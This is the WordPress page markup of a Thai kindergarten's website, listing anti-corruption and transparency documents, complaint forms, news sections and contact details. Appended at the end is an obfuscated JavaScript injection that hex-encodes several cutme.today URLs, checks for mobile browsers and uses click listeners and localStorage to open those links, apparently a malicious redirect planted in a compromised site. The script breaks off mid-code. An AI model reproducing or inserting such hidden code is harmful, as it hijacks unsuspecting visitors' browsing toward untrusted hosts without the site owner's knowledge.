wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 